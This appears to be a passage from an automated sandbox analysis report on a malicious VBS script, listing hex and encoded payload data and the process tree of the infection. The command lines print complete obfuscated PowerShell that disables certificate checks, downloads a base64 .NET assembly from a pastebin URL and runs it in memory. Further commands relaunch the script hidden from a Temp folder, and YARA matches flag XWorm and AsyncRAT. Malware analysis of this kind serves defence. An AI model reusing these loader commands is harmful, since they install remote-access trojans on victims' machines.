                                                            2024-10-03 04:53:35 UTC1071INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            2024-10-03 04:53:35 UTC1369INData Raw: 32 30 30 30 0d 0a 42 64 48 6f 45 41 41 53 42 46 44 6f 45 63 30 52 33 42 4b 42 48 6c 48 6f 45 63 59 77 42 50 55 68 67 53 30 61 67 53 45 41 41 49 6b 68 67 52 45 51 41 67 59 67 41 64 77 52 48 63 30 52 46 43 4b 52 72 42 4b 42 48 47 63 77 44 4f 55 4d 67 53 34 41 43 43 55 77 42 4a 45 68 67 53 41 41 49 46 34 51 44 43 4b 52 41 41 59 51 43 43 4b 52 42 43 4b 68 41 48 67 67 44 42 6f 77 41 43 41 67 48 43 6b 66 67 53 55 42 41 65 45 51 41 43 4b 52 46 43 49 51 41 51 4d 68 41 4f 49 51 2b 42 4b 52 46 48 30 61 67 53 30 42 41 41 59 41 41 54 45 51 41 67 55 67 44 42 55 66 67 53 55 68 42 74 47 6f 45 64 67 67 44 64 67 51 72 42 4b 68 44 42 55 66 67 53 55 42 48 49 67 77 42 56 45 55 45 42 46 68 41 43 41 77 42 42 46 42 41 67 51 51 44 42 46 52 41 41 55 67 44 64 4d 51 48 46 44 6f 45
                                                            Data Ascii: 2000BdHoEAASBFDoEc0R3BKBHlHoEcYwBPUhgS0agSEAAIkhgREQAgYgAdwRHc0RFCKRrBKBHGcwDOUMgS4ACCUwBJEhgSAAIF4QDCKRAAYQCCKRBCKhAHggDBowACAgHCkfgSUBAeEQACKRFCIQAQMhAOIQ+BKRFH0agS0BAAYAATEQAgUgDBUfgSUhBtGoEdggDdgQrBKhDBUfgSUBHIgwBVEUEBFhACAwBBFBAgQQDBFRAAUgDdMQHFDoE
                                                            2024-10-03 04:53:35 UTC1369INData Raw: 67 41 41 55 41 41 54 45 67 43 45 41 77 45 43 41 77 45 42 67 68 45 56 59 41 41 54 45 77 42 45 41 67 48 42 6f 41 42 41 34 42 41 42 41 52 42 41 34 68 41 41 34 52 41 48 51 67 44 42 63 77 41 31 43 59 45 56 49 52 41 41 63 51 46 53 45 77 42 45 67 51 41 48 4d 41 48 63 45 41 41 45 49 51 41 48 4d 41 46 53 45 77 42 45 45 68 45 42 63 41 42 49 49 52 41 48 51 41 44 53 45 77 42 45 51 68 45 42 67 68 45 56 59 51 45 53 45 41 47 53 55 68 42 49 49 52 41 59 49 52 46 47 77 67 45 42 67 68 45 56 59 67 50 6b 39 47 61 30 56 57 62 67 51 57 5a 30 46 6d 63 6c 35 57 5a 6e 78 6a 45 6c 42 58 65 55 52 67 44 55 42 51 41 2b 51 32 62 6f 52 58 5a 74 42 43 5a 6c 52 58 59 79 56 6d 62 6c 64 47 50 53 41 51 41 78 49 51 41 42 41 43 42 41 41 41 41 66 39 56 5a 6a 35 57 59 30 4e 6e 62 4a 39 31 58 6c
                                                            Data Ascii: gAAUAATEgCEAwECAwEBghEVYAATEwBEAgHBoABA4BABARBA4hAA4RAHQgDBcwA1CYEVIRAAcQFSEwBEgQAHMAHcEAAEIQAHMAFSEwBEEhEBcABIIRAHQADSEwBEQhEBghEVYQESEAGSUhBIIRAYIRFGwgEBghEVYgPk9Ga0VWbgQWZ0Fmcl5WZnxjElBXeURgDUBQA+Q2boRXZtBCZlRXYyVmbldGPSAQAxIQABACBAAAAf9VZj5WY0NnbJ91Xl
                                                            2024-10-03 04:53:35 UTC1369INData Raw: 43 53 41 41 41 45 77 67 45 41 41 41 42 42 41 41 41 44 51 68 45 42 67 68 45 56 59 77 42 52 49 52 41 59 49 52 46 47 63 41 43 53 45 41 47 53 55 68 42 48 77 67 45 42 67 68 45 56 59 77 42 4a 43 4f 4e 5a 59 46 58 36 64 4c 43 49 41 41 41 44 34 41 41 41 4d 51 41 41 41 79 41 36 6f 51 31 52 38 33 58 2f 41 4c 43 41 6b 4e 42 45 31 68 71 74 4e 4d 6e 4a 31 66 71 46 36 4c 55 4a 6c 4d 41 41 4d 44 41 4d 42 77 4d 41 6b 46 41 45 42 51 52 41 51 45 41 30 41 77 53 41 55 47 41 47 42 41 4f 41 51 46 41 55 42 67 4d 41 63 48 41 6b 42 67 51 41 45 48 41 4a 42 67 59 41 6b 48 41 52 42 77 56 41 34 47 41 31 42 51 57 41 38 45 41 50 42 41 53 41 6f 48 41 59 42 51 55 41 51 45 41 36 42 41 4f 41 4d 44 41 71 42 77 54 41 63 46 41 4b 42 67 62 41 55 47 41 31 42 51 59 41 34 47 41 4c 42 77 56 41 45
                                                            Data Ascii: CSAAAEwgEAAABBAAADQhEBghEVYwBRIRAYIRFGcACSEAGSUhBHwgEBghEVYwBJCONZYFX6dLCIAAAD4AAAMQAAAyA6oQ1R83X/ALCAkNBE1hqtNMnJ1fqF6LUJlMAAMDAMBwMAkFAEBQRAQEA0AwSAUGAGBAOAQFAUBgMAcHAkBgQAEHAJBgYAkHARBwVA4GA1BQWA8EAPBASAoHAYBQUAQEA6BAOAMDAqBwTAcFAKBgbAUGA1BQYA4GALBwVAE
                                                            2024-10-03 04:53:35 UTC1369INData Raw: 41 6f 47 41 34 41 41 4f 41 34 45 41 30 41 51 4f 41 6b 44 41 31 42 77 55 41 4d 45 41 34 42 67 53 41 67 44 41 74 42 51 62 41 63 47 41 4c 42 51 53 41 55 47 41 56 42 41 61 41 6b 47 41 75 42 41 62 41 6b 48 41 71 42 77 4d 41 6b 45 41 4c 42 41 53 41 59 47 41 52 42 67 4e 41 59 46 41 30 42 41 4e 41 49 44 41 45 42 51 51 41 49 46 41 44 42 51 55 41 67 47 41 59 42 77 53 70 43 49 41 41 41 46 41 78 41 67 54 41 51 45 41 76 42 51 63 41 49 44 41 5a 42 67 63 41 77 47 41 53 42 77 53 41 45 45 41 44 42 77 59 41 6b 44 41 46 42 41 4f 41 59 46 41 34 42 67 53 41 63 44 41 57 42 51 64 41 67 45 41 53 42 51 61 41 6f 45 41 72 42 67 4e 41 4d 46 41 36 42 51 56 41 6f 47 41 51 42 77 61 41 55 47 41 59 42 41 57 41 49 44 41 33 42 51 5a 41 49 46 41 6a 42 77 5a 41 67 45 41 74 42 77 63 41 6b 48
                                                            Data Ascii: AoGA4AAOA4EA0AQOAkDA1BwUAMEA4BgSAgDAtBQbAcGALBQSAUGAVBAaAkGAuBAbAkHAqBwMAkEALBASAYGARBgNAYFA0BANAIDAEBQQAIFADBQUAgGAYBwSpCIAAAFAxAgTAQEAvBQcAIDAZBgcAwGASBwSAEEADBwYAkDAFBAOAYFA4BgSAcDAWBQdAgEASBQaAoEArBgNAMFA6BQVAoGAQBwaAUGAYBAWAIDA3BQZAIFAjBwZAgEAtBwcAkH
                                                            2024-10-03 04:53:35 UTC1369INData Raw: 42 77 61 41 55 48 41 69 42 41 63 41 34 47 41 4f 42 51 55 41 6f 46 41 35 42 51 4e 41 63 45 41 77 41 67 64 41 45 46 41 76 42 67 61 41 55 46 41 47 42 51 4f 41 30 47 41 4b 42 41 64 41 49 44 41 68 42 51 53 41 4d 48 41 4f 42 77 4e 41 77 47 41 77 41 51 55 41 41 44 41 77 41 51 57 48 44 49 41 41 67 45 41 73 42 67 4d 41 55 47 41 7a 42 41 52 41 51 47 41 36 42 51 57 41 45 46 41 76 42 41 54 41 6f 47 41 47 42 41 65 41 45 44 41 6f 42 67 63 41 4d 47 41 4d 42 41 65 41 59 46 41 77 42 67 56 41 34 47 41 32 42 77 63 41 6b 44 41 4d 42 67 5a 41 63 47 41 47 42 77 55 41 6f 47 41 36 42 77 4e 41 6f 47 41 47 42 67 61 41 51 44 41 74 42 67 64 41 63 45 41 56 42 51 54 41 77 47 41 58 42 51 61 41 63 47 41 4a 42 41 4d 41 6b 48 41 46 42 41 57 41 34 47 41 79 42 41 4f 41 77 47 41 72 42 67 56
                                                            Data Ascii: BwaAUHAiBAcA4GAOBQUAoFA5BQNAcEAwAgdAEFAvBgaAUFAGBQOA0GAKBAdAIDAhBQSAMHAOBwNAwGAwAQUAADAwAQWHDIAAgEAsBgMAUGAzBARAQGA6BQWAEFAvBATAoGAGBAeAEDAoBgcAMGAMBAeAYFAwBgVA4GA2BwcAkDAMBgZAcGAGBwUAoGA6BwNAoGAGBgaAQDAtBgdAcEAVBQTAwGAXBQaAcGAJBAMAkHAFBAWA4GAyBAOAwGArBgV
                                                            2024-10-03 04:53:35 UTC1355INData Raw: 47 41 71 42 77 51 41 4d 44 41 42 42 41 52 41 49 45 41 47 42 51 51 41 77 45 41 31 42 41 54 41 51 47 41 42 42 77 63 41 55 47 41 35 41 77 64 41 49 44 41 75 42 67 4d 41 63 48 41 79 41 41 57 48 44 49 41 41 63 44 41 59 42 51 52 41 45 46 41 31 42 41 61 41 49 48 41 30 41 67 51 41 63 48 41 30 41 51 61 41 63 48 41 47 42 77 56 41 45 44 41 51 42 67 61 41 51 48 41 4b 42 41 62 41 6f 46 41 71 42 51 59 41 4d 45 41 6d 42 67 64 41 45 44 41 46 42 41 55 41 63 44 41 77 42 77 52 41 55 44 41 72 42 67 57 41 51 46 41 74 42 67 51 41 49 48 41 52 42 51 5a 41 6f 47 41 71 42 67 64 41 59 45 41 61 42 67 53 41 49 48 41 75 42 51 4e 41 49 46 41 33 42 41 64 41 49 47 41 43 42 51 61 41 49 45 41 74 42 41 53 41 63 45 41 6c 42 51 52 41 63 44 41 79 42 67 4d 41 49 46 41 32 42 77 55 41 6f 45 41 72
                                                            Data Ascii: GAqBwQAMDABBARAIEAGBQQAwEA1BATAQGABBwcAUGA5AwdAIDAuBgMAcHAyAAWHDIAAcDAYBQRAEFA1BAaAIHA0AgQAcHA0AQaAcHAGBwVAEDAQBgaAQHAKBAbAoFAqBQYAMEAmBgdAEDAFBAUAcDAwBwRAUDArBgWAQFAtBgQAIHARBQZAoGAqBgdAYEAaBgSAIHAuBQNAIFA3BAdAIGACBQaAIEAtBASAcEAlBQRAcDAyBgMAIFA2BwUAoEAr



                                                            Target ID:0
                                                            Start time:00:53:00
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                                                            Imagebase:0x7ff7cfbd0000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:00:53:01
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) 
);$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:00:53:01
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:4
                                                            Start time:00:53:03
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL, Description: Detects executables (downloaders) containing reversed URLs to raw contents of a paste, Source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: MALWARE_Win_DLAgent09, Description: Detects known downloader agent, Source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:00:53:08
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:00:53:13
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0x100000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:00:53:13
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                            Imagebase:0xea0000
                                                            File size:65'440 bytes
                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3349422989.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:9
                                                            Start time:00:53:21
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:00:53:21
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:00:53:22
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                                                            Imagebase:0x7ff7cfbd0000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:00:53:25
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) 
);$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:00:53:25
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:00:53:25
                                                            Start date:03/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"
                                                            Imagebase:0x7ff7be880000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.2403141075.00000272D6986000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.2403141075.00000272D6986000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            Has exited:true
